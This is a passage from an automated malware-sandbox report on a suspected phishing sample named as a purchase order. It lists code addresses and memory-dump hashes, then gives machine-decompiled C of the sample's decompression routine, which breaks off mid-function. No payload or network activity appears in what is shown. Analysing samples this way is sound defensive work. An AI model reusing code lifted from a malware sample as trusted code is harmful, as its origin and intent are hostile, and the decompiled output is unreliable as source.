                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004066bb
                      0x004066b8
                      0x00000000
                      0x004062ef

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                      • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                      • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                      • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406409, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
